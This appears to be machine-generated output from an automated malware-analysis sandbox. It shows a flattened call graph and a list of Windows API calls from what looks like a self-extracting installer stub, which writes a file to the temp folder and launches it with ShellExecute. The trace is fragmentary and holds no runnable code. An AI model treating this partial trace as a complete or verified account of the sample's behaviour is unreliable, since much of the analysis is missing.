9611->9608 9613 402a69 9 API calls 9612->9613 9615 403263 lstrcmpW 9613->9615 9614->9609 9615->9609 9616->9609 9617->9609 9622 402f6c 7 API calls 9619->9622 9620->9609 9621 4032c0 lstrcmpW 9620->9621 9621->9609 9623 40333c 9622->9623 10411 402425 ??3@YAXPAX ??3@YAXPAX 9623->10411 9624->9609 9627 402f86 9626->9627 9628 402f7b 9626->9628 9630 408761 4 API calls 9627->9630 10413 402668 9628->10413 9631 402f92 9630->9631 9631->9132 9632->9132 9634 4024fc 2 API calls 9633->9634 9635 40485f 9634->9635 9636 40254d 2 API calls 9635->9636 9637 40486c 9636->9637 9638 404888 9637->9638 9639 401429 2 API calls 9637->9639 9640 40254d 2 API calls 9638->9640 9639->9637 9641 404892 
9640->9641 9642 40408b 94 API calls 9641->9642 9643 40489d ??3@YAXPAX 9642->9643 9643->9176 9645 4040a2 lstrlenW 9644->9645 9646 4040ce 9644->9646 9647 401a85 4 API calls 9645->9647 9646->9176 9648 4040b8 9647->9648 9648->9645 9648->9646 9649 4040d5 9648->9649 9650 4024fc 2 API calls 9649->9650 9653 4040de 9650->9653 10418 402776 9653->10418 9654 403093 84 API calls 9655 40414c 9654->9655 9656 404156 ??3@YAXPAX ??3@YAXPAX 9655->9656 9657 40416d ??3@YAXPAX ??3@YAXPAX 9655->9657 9656->9646 9657->9646 9658->9189 9660 40661a 2 API calls 9659->9660 9661 403b48 9660->9661 9661->9178 9663 408646 9662->9663 9675 4083d5 ctype 9662->9675 9663->9184 9664 40661a 2 API calls 9664->9675 9665 40786b 23 API calls 9665->9675 9666 40243b lstrcmpW 9666->9675 9668 407674 23 API calls 9668->9675 9669 407613 23 API calls 9669->9675 9670 403b40 2 API calls 9670->9675 9671 401f9d 19 API calls 9671->9675 9672 407776 55 API calls 9672->9675 9673 403f48 4 API calls 9673->9675 9674 4073d1 21 API calls 9674->9675 9675->9663 9675->9664 9675->9665 9675->9666 9675->9668 9675->9669 9675->9670 9675->9671 9675->9672 9675->9673 9675->9674 9676 407717 25 API calls 9675->9676 9677 4073d1 21 API calls 9675->9677 10428 40744b 9675->10428 9676->9675 9678 408476 ??3@YAXPAX 9677->9678 9678->9675 9680 40243b lstrcmpW 9679->9680 9681 4082fd 9680->9681 9682 40830b 9681->9682 10432 4019f0 GetStdHandle WriteFile 9681->10432 9684 40831e 9682->9684 10433 4019f0 GetStdHandle WriteFile 9682->10433 9686 408333 9684->9686 10434 4019f0 GetStdHandle WriteFile 9684->10434 9688 408344 9686->9688 10435 4019f0 GetStdHandle WriteFile 9686->10435 9690 40243b lstrcmpW 9688->9690 9691 408351 9690->9691 9694 40835f 9691->9694 10436 4019f0 GetStdHandle WriteFile 9691->10436 9693 40243b lstrcmpW 9695 40836c 9693->9695 9694->9693 9696 40837a 9695->9696 10437 4019f0 GetStdHandle WriteFile 9695->10437 9698 40243b lstrcmpW 9696->9698 9699 408387 9698->9699 9700 408395 9699->9700 10438 4019f0 GetStdHandle WriteFile 9699->10438 9702 
40243b lstrcmpW 9700->9702 9703 4083a2 9702->9703 9704 4083b2 9703->9704 10439 4019f0 GetStdHandle WriteFile 9703->10439 9704->9180 9707 407636 9706->9707 9708 407658 9707->9708 9709 40764b 9707->9709 10443 407186 9708->10443 10440 407154 9709->10440 9712 407653 9713 4073d1 21 API calls 9712->9713 9714 407671 9713->9714 9714->9222 9716 407689 9715->9716 9717 40716d 2 API calls 9716->9717 9718 407694 9717->9718 9719 4073d1 21 API calls 9718->9719 9720 4076a5 9719->9720 9720->9222 9722 401411 2 API calls 9721->9722 9723 403f96 9722->9723 9724 402535 2 API calls 9723->9724 9725 403f9f GetTempPathW 9724->9725 9726 403fb8 9725->9726 9731 403fcf 9725->9731 9727 402535 2 API calls 9726->9727 9728 403fc3 GetTempPathW 9727->9728 9728->9731 9729 402535 2 API calls 9730 403ff2 wsprintfW 9729->9730 9730->9731 9731->9729 9732 404009 GetFileAttributesW 9731->9732 9733 40402d 9731->9733 9732->9731 9732->9733 9733->9207 9735 40787e 9734->9735 10449 40719f 9735->10449 9738 4073d1 21 API calls 9739 4078b3 9738->9739 9739->9225 9741 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9740->9741 9742 403e16 9740->9742 9741->9226 9743 402c86 16 API calls 9742->9743 9743->9741 9745 40243b lstrcmpW 9744->9745 9746 40455d 9745->9746 9747 404592 9746->9747 9748 401329 2 API calls 9746->9748 9747->9277 9749 40456c 9748->9749 9750 403b7f 19 API calls 9749->9750 9751 404572 9750->9751 9751->9747 9752 401429 2 API calls 9751->9752 9752->9747 9754 4012f7 2 API calls 9753->9754 9755 4043d4 9754->9755 9756 40254d 2 API calls 9755->9756 9757 4043df 9756->9757 9757->9266 9759 4021a9 9758->9759 9760 40218e LoadLibraryA GetProcAddress 9758->9760 9759->9323 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 
404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 
9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 
9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 
EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9609 10391->10389 10392->9609 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9606 10411->9595 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9627 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9654 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9675 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9682 10433->9684 10434->9686 10435->9688 10436->9694 10437->9696 10438->9700 10439->9704 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9712 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9712 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9738 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 
                                          APIs
                                            • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                            • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                            • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                            • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                            • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                            • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                            • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                          • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                          • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                            • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                            • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                          • _wtol.MSVCRT ref: 0040509F
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                          • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                          • _wtol.MSVCRT ref: 00405217
                                          • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                            • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                            • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                            • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                            • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                            • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                            • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                            • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                            • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                            • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                            • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                            • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                            • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                          • wsprintfW.USER32 ref: 00405595
                                          • _wtol.MSVCRT ref: 004057DE
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                          • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                          • CoInitialize.OLE32(00000000), ref: 004059E9
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                          • GetKeyState.USER32(00000010), ref: 00405AA1
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                          • memset.MSVCRT ref: 004060AE
                                          • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                          • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                            • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                            • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                            • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                            • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                            • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                          • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                          • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                          • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                          • _wtol.MSVCRT ref: 00405F65
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
